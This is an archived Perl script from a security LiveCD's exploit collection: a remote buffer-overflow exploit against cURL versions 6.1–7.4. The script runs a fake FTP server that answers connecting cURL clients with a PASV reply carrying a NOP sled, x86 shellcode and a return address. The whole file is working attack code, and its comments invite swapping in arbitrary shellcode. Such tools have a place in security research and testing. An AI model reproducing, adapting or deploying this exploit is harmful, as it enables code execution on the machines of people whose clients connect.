home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / linux / remote / cURL-remote-LNX.pl < prev    next >
Encoding:
Perl Script  |  2005-02-12  |  2.6 KB  |  89 lines
  1. #!/usr/bin/perl
  2. #
  3. # Remote linux cURL exploit for versions 6.1 - 7.4
  4. #
  5. # Written by zillion (at http://safemode.org && http://www.snosoft.com)
  7. # This exploit, which has been tested to work with cURL 6.4, 7.2 and 7.3,  
  8. # may only be used for testing purposes. Additionally, the author does not 
  9. # take any resposibilities for abuse of this file. More information about  
  10. # the used vulnerability can be found on securityfocus:
  11. #
  12. # http://online.securityfocus.com/bid/1804
  13. #
  14. # The shellcode will write "Owned by a cURL ;)" to the file /tmp/0wned.txt
  15. # You can replace it with whatever you want but be warned: due to buffer 
  16. # manipilation working shellcode might be altered.
  17. #
  18. # A FreeBSD version is also available on safemode.org
  19.  
  20. use IO::Socket;
  21. use Net::hostent;
  22.  
  23. $shellcode = # does a open() write() close() and exit(). 
  24.         "\xeb\x40\x5e\x31\xc0\x88\x46\x0e\xc6\x46\x21\x09\xfe\x46\x21".
  25.         "\x88\x46\x22\x8d\x5e\x0f\x89\x5e\x23\xb0\x05\x8d\x1e\x66\xb9".
  26.         "\x42\x04\x66\xba\xe4\x01\xcd\x80\x89\xc3\xb0\x04\x8b\x4e\x23".
  27.         "\x66\xba\x0f\x27\x66\x81\xea\xfc\x26\xcd\x80\xb0\x06\xcd\x80".
  28.         "\xb0\x01\x31\xdb\xcd\x80\xe8\xbb\xff\xff\xff\x2f\x74\x6d\x70".
  29.         "\x2f\x30\x77\x6e\x65\x64\x2e\x74\x78\x74\x23\x30\x77\x6e\x65".
  30.         "\x64\x20\x62\x79\x20\x61\x20\x63\x55\x52\x4c\x20\x3b\x29";
  31.  
  32. while($_ = $ARGV[0], /^-/) {
  33.     shift;       
  34.     last if /^--$/;
  35.     /^-p/ && do { $port = shift; };
  36.     /^-l/ && do { $list = 1; };
  37.     /^-o/ && do { $offset = shift; };
  38. }
  39.  
  40.  
  41. $id     = `id -u`; chop($id);
  42. $size   =  249;
  43. $esp    =  0xbffff810;
  44. $offset =  -150 unless $offset;
  45. $port   =  21 unless $port;
  46.  
  47. if(!$list || $port > 1024 && $id != 0) {
  48.  
  49. print <<"TWENTE";
  50.  
  51.    Usage :  $0 -l 
  52.    Option:  $0 -p <port to listen on>
  53.    Option:  $0 -o <offset>
  54.  
  55.    Note: low ports require root privileges
  56.  
  57. TWENTE
  58. exit;
  59.  
  60. }
  61.  
  62. for ($i = 0; $i < ($size - length($shellcode)) - 4; $i++) {
  63.     $buffer .= "\x90";
  64. }
  65.  
  66. $buffer .= "$shellcode";
  67. $buffer .= pack('l', ($esp + $offset)); 
  68.  
  69. print("Listening on port $port. We are using return address: 0x", sprintf('%lx',($esp - $offset)), "\n");
  70.  
  71. my $sock = new IO::Socket::INET (
  72.                                  LocalPort => $port,
  73.                                  Proto => 'tcp',
  74.                                  Listen => 1,
  75.                                  Reuse => 1,
  76.                                 );
  77. die "Could not create socket: $!\n" unless $sock;
  78.  
  79. while($cl = $sock->accept()) {
  80.  
  81.    $hostinfo = gethostbyaddr($cl->peeraddr);
  82.    printf "[Received connect from %s]\n", $hostinfo->name || $cl->peerhost;
  83.    print $cl "220 Safemode.org FTP server (Version 666) ready.\n";
  84.    print $cl "230 Ok\n";
  85.    print $cl "227 $buffer\n";
  86.    sleep 2;
  87.  
  88. }
  89.